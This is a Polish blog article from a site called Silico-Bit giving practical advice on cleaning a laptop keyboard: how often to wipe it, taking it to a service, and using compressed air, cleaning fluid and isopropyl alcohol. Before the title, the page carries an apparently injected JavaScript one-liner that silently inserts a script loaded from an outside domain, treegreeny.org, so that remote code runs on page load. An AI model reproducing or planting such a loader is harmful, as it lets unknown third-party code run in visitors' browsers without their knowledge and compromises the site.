;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jak wyczyścić klawiaturę laptopa? | Silico-Bit
Klawiatura w naszym laptopie wymaga systematycznego czyszczenia. Wie to każdy kto chociaż raz jadł przy laptopie posiłek lub miał przyjemność rozkręcać swój sprzęt. Kurz, brud, resztki jedzenia, włosy i inne zanieczyszczenia dostają się między klawisze, a sama klawiatura staje się ogromnym siedliskiem bakterii. Zaniedbanie czyszczenia klawiatury może skończyć się tym, że przestanie działać, a jej systematyczne czyszczenie może skutecznie wydłużyć życie naszego sprzętu. Jak wyczyścić klawiaturę samodzielnie w domu? Czy można to zrobić bez pomocy specjalistycznych serwisów komputerowych?

Klawiatura laptopa

Jak często czyścić klawiaturę w laptopie?

Zacznijmy od tego, że klawiaturę w laptopie należy czyścić systematycznie. Można to robić codziennie lub przynajmniej raz w tygodniu przy pomocy wilgotnej (ale nie mokrej) ściereczki. W ten sposób na bieżąco będziemy usuwać gromadzący się na wierzchu kurz i brud, które nie przedostaną się głębiej. Dodatkowo warto zawsze zadbać o to, aby po skończonej pracy zamknąć laptopa. Odsłonięta klawiatura laptopa szybciej się zanieczyszcza. Gruntowne czyszczenie klawiatury można wykonywać rzadziej np. raz na kwartał lub w momencie kiedy mocno ją czymś ubrudzimy.

Jak czyścić klawiaturę w laptopie?

Sposobów na gruntowne czyszczenie klawiatury laptopa jest wiele. Nie każdy sposób będzie remedium na wszystko, dlatego trzeba odpowiednio dostosować go do zaistniałej sytuacji.

Serwis laptopów

Najbezpieczniejszym rozwiązaniem będzie oddanie swojego sprzętu – przynajmniej raz na pół roku – do profesjonalnego serwisu sprzętu.  Takie firmy mają wieloletnie doświadczenie z różnymi usterkami i przy okazji czyszczenia naszej klawiatury mogą dać nam informacje zwrotną np. o stanie podzespołów w naszym laptopie. Dodatkowo zaoszczędzi nam to masę czasu, ponieważ czyszczenie klawiatury może okazać się bardzo czasochłonne.

Czyszczenie klawiatury w domu

Gruntowne czyszczenie klawiatury w laptopie zaczynamy od usunięcia wierzchniego brudu widocznego gołym okiem. Pomocne nam w tym będą patyczki do uszu z alkoholem izopropylowym, sprężone powietrze oraz bawełniana szmatka z preparatem do elektroniki.

Pamiętajmy, aby oczyszczanie klawiatury w laptopie zacząć od jego wyłączenia, odłączenia od prądu i wyciągnięcia baterii dla bezpieczeństwa.

Czyszczenie klawiatury w laptopie zaczynamy od zastosowania pędzelka lub sprężonego powietrza. Okruchy wymiatamy delikatnie na zewnątrz, bez gwałtownych ruchów. Puszkę ze sprężonym powietrzem należy trzymać pod kątem, tak aby zanieczyszczenia wydobywały się na zewnątrz, a nie wpadały jeszcze głębiej. Następnie używany specjalnego preparatu do czyszczenia elektroniki, który rozprowadzamy wokół przycisków i rozcieramy go przy pomocy bawełnianej szmatki. Pamiętajmy, aby wybrać odpowiedni materiał, aby nie pogorszyć stanu naszej klawiatury. W tym kroku musimy pamiętać, aby dokładnie przetrzeć każdą powierzchnię dookoła przycisków. W kolejnym kroku pomogą nam patyczki do uszu nasączone alkoholem izopropylowym. Dostaną się one bowiem w trudno dostępne miejsca z którymi nie poradziła sobie ściereczka. Dzięki wilgotnej i miękkiej końcówce, wydostaną z zakamarków większe zanieczyszczenia oraz zgromadzony w nich kurz. Krok ten pozwala nam także zdezynfekować klawiaturę laptopa i usunąć osiadające na niej bakterie. Na sam koniec można ponownie przetrzeć klawiaturę bawełnianą szmatką lub wacikiem kosmetycznym, delikatnie nawilżonym w wodzie. Tak oczyszczoną klawiaturę laptopa należy pozostawić do wyschnięcia na około 15 minut i to po tym czasie, sprzęt będzie gotowy do dalszego używania!

czyszczenie klawiatury patyczkiem do uszu

Produkty do czyszczenia klawiatury

Na rynku mamy wiele różnych produktów, które mają pomagać nam wyczyścić klawiaturę. Przykładem mogą być wszelkiego rodzaju szmatki antystatyczne lub gumy i plasteliny, które w łatwy sposób usuną zabrudzenia nie tylko z klawiatury laptopa. Oczywiście takie gadżety sprawdzą się podczas systematycznego i bieżącego czyszczenia klawiatury w laptopie, jednak mimo ich stosowania należy pamiętać, aby raz na jakiś czas gruntownie wyczyścić nasz sprzęt. Systematyczne oraz gruntowne czyszczenie klawiatury w laptopie to bardzo ważna czynność, której nie należy bagatelizować. Pośrednio dba ona nie tylko o nasze zdrowie, ale również o żywotność używanego przez nas sprzętu.